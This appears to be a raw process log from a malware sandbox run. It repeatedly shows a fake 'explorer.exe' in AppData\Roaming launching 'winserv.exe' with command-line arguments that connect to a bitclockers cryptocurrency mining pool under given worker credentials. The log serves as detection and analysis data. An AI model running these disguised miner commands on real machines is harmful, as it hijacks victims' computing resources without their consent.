C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
